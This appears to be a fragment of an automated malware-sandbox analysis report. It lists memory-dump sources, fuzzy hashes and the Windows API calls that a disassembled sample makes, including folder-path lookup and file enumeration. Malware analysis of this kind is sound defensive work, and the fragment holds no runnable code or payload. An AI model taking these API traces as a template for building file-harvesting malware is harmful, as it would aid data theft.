                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 4aa1137ca4ab0d025deca313c096eef7067b0fc431d41cb3dab29450851791cc
                              • Instruction ID: 4cc6c0933a45b50f9c89d76287e0631317194f9c84bfb40e9430849b3f5f8c90
                              • Opcode Fuzzy Hash: 4aa1137ca4ab0d025deca313c096eef7067b0fc431d41cb3dab29450851791cc
                              • Instruction Fuzzy Hash: F6F09032900204FFD726BBB8580BB4E33A06F82721F244349F404A61D3CB6C59409F96
                              Function 007A4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4F7A
                              • lstrcat.KERNEL32(?,007B1070), ref: 007A4F97
                              • lstrcat.KERNEL32(?,014C9190), ref: 007A4FAB
                              • lstrcat.KERNEL32(?,007B1074), ref: 007A4FBD
                                • Part of subcall function 007A4910: wsprintfA.USER32 ref: 007A492C
                                • Part of subcall function 007A4910: FindFirstFileA.KERNEL32(?,?), ref: 007A4943
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B0FDC), ref: 007A4971
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B0FE0), ref: 007A4987
                                • Part of subcall function 007A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 007A4B7D
                                • Part of subcall function 007A4910: FindClose.KERNEL32(000000FF), ref: 007A4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 9f3b30d38bbc5af83a991fe5401f7228685181a36fea3782df04be56ce5086cc
                              • Instruction ID: 28b93fb1be299041fab0ca1c93b267186c2d7a683738a3177627b8dfa75dc277
                              • Opcode Fuzzy Hash: 9f3b30d38bbc5af83a991fe5401f7228685181a36fea3782df04be56ce5086cc
                              • Instruction Fuzzy Hash: 1F210DB6954204EBC754FBB0EC4AFEE333CA795300F404545B64952181EE78AAD8DB93